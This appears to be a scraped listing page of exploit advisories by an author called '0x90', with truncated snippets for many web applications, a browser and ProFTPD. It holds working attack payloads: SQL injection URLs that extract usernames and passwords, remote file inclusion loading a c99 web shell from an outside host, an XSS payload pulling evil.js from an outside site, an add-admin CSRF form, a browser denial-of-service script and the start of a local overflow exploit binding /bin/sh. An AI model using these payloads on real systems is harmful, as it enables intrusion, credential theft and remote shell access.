RPG.Board = 0.0.8Beta2 Remote SQL Injection

[~] RPG.Board = 0.0.8Beta2 Remote SQL Injection [~] Author: 0x90 [~] HomePage: www.0x90.com.ar [~] Contact: Guns[at]0x90[dot]com[dot]ar [~] Script: RPG.Board [~] site: http://rpgmaster.de/viewtopic.php?f=25t=69 [~] Vulnerability Class: SQL Injection [~] Exploit

MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

SQL Injection [~] Author: 0x90 [~] HomePage: www.0x90.com.ar [~] Contact: Guns[at]0x90[dot]com[dot]ar [~] Script: MapCal - The Mapping Calendar [~] site: http://mapcal.sourceforge.net [~] Vulnerability Class: SQL Injection [~] Exploit: http://localhost/cms/index.php

MyFWB 1.0 Remote SQL Injection

MyFWB 1.0 Remote SQL Injection Author: 0x90 url: www.0x90.com.ar Product: MyFWB download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip Version: 1.0 URL: http://www.fsoft.co.nr/ Vulnerability Class: SQL Injection contact: Guns[at]0x90[dot]com[dot]ar Username: http://host/MyFWB/?page

Avant Browser = 11.7 Build 9 Integer Denial Of Service Exploit

!-- - Product : Avant Browser - - Version : 11.7 Build 9 - - Author : 0x90 - - Homepage: WwW.0x90.CoM.Ar - - Contact : Guns[at]0x90[dot]com[dot]ar -- script var s=String.fromCharCode(257); var a=; var b=; for(i=0;i1024;i++){a=a+s;} for(i=0;i1024;i++){b=b+a;} var ov=s; for(i=0;i28

phpAddressBook v2.11 Multiple Local File Inclusion Vulnerabilities

Inclusion Vulnerabilities [~] Download: http://downloads.coronamatrix.org/phpAddressBookv2.11.zip [~] Founder: 0x90 [~] HomePage: www.0x90.com.ar [~] Public: http://0x90.com.ar/Advisory/20080321.txt [~] Contact: Guns[at]0x90[dot]com[dot]ar [~] PoC: http://[host]/[path]/index.php?skin

PHP-Nuke Module Advertising Blind SQL Injection

#!/usr/bin/perl #Product: PHP-Nuke Module Advertising #BugFounder: 0x90 #HomePage: WwW.0x90.COM.Ar #Problem: Blind SQL Injection use strict; use warnings; use LWP; use Time::HiRes; use IO::Socket; my $host = http://[url]/modules.php?name=Advertising;; my $useragent =

IDMOS v1.0 Alpha Multiple RFI Vulnerability

#Author: 0x90 #HomePage: WwW.0x90.CoM.Ar #Contact: Guns[at]0x90[dot]com[dot]ar #Vendor: IDMOS v1.0 Alpha #Download: http://ufpr.dl.sourceforge.net/sourceforge/idmos/idmos.zip #PoC http://[target]/administrator/admin.php?site_absolute_path=http://shell? http://[target]/administrator

PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection

!-- - Author : 0x90 - - Homepage: WwW.0x90.CoM.Ar - - Contact : Guns[at]0x90[dot]com[dot]ar - - Product : Php Nuke add-on MS TopSites - - Website : http://phpnuke.org/ - - Download: http://www.weblord.it/downloads/nuke65/addons/MS_TopSites_ITA.zip - - Problem : Edit Exploit

sBlog 0.7.3 Beta Cross Site Request Forgery

!-- - Product : sBlog - - Version : 0.7.3 Beta - - Website : http://www.sblog.se - - Author : 0x90 - - Homepage: WwW.0x90.CoM.Ar - - Contact : Guns[at]0x90[dot]com[dot]ar - - Problem : Cross Site Request Forgery Vulnerability - - Sumary : sBlog has, by default, no CSRF

AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit

!-- - Product : AGTC-Membership system - Version : 1.1a - Website : http://www.agtc.co.uk - Author : 0x90 - HomePage : WwW.0x90.CoM.Ar - Contact : Guns[at]0x90[dot]com[dot]ar - Problem : Admin Added Access. -- form name=form1 method=post action=http://[target]/adduser.php; h3 align

Micro Login System v1.0 (userpwd.txt) Password Disclosure Vulnerability

Micro Login System v1.0 (userpwd.txt) Password Disclosure Vulnerability #Affected Software: Micro Login System v1.0 #Download: http://www.hotscripts.com/jump.php?listing_id=67504jump_type=1 #Bugfounder: 0x90 #Contact: Guns[at]0x90[dot]com[dot]ar #homepage: WwW.0x90.CoM.Ar #[+]Exploit: http

Joomla! swMenuFree 4.6 Component Remote File Include

./modules/mod_swmenufree/styles.php); // -- RFI preview.php:13: require_once($mosConfig_absolute_path ./modules/mod_swmenufree/functions.php); // -- RFI #Expl0it: http://www.site.com/components/com_swmenufree/preview.php?mosConfig_absolute_path=http://scriptkiddie.com/c99haxor.txt? #Contact: Guns

sBlog 0.7.3 Beta XSS Vulnerabilitie

# sBlog 0.7.3 Beta XSS Vulnerabilitie # Found by 0x90 # www.0x90.com.ar # msn mail: [EMAIL PROTECTED] # in blog http://host/blog/search.php # use '//script src=http://yoursite.com/evil.js # Welcome to the jungle!

Angel LMS 7.1 - Remote SQL Injection

# Angel LMS 7.1 Remote SQL Injection # by Guns #All User Accounts# http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts-- #Account Passwords# http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password

XLAtunes 0.1 (album) Remote SQL Injection Vulnerability

#Critical Status:High #Found By: 0x90 #Download:http://www.scriptdungeon.com/script.php?ScriptID=2844 #Greetz:all my friends #confkey-Password #confvalue-Username #Table:config #http://host.com/path/?mode=viewalbum=-1%20UNION%20SELECT%20confkey%20FROM%20config/*

XLAtunes 0.1 (album) Remote SQL Injection Vulnerability

#Critical Status:High #Found By: 0x90 #Download:http://www.scriptdungeon.com/script.php?ScriptID=2844 #Greetz:all my friends #confkey-Password #confvalue-Username #Table:config #http://host.com/path/?mode=viewalbum=-1%20UNION%20SELECT%20confkey%20FROM%20config/*

ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit

#!/usr/bin/perl -w # Local Exploit # # [ Exploitation condition ] # - proftpd must be compiled with --enable-ctrls option # - local user needs permission to connect through unix socket (from proftpd.conf) # # This one works for 2.6 exploitation against gcc 4.x # Payload will bind /bin/sh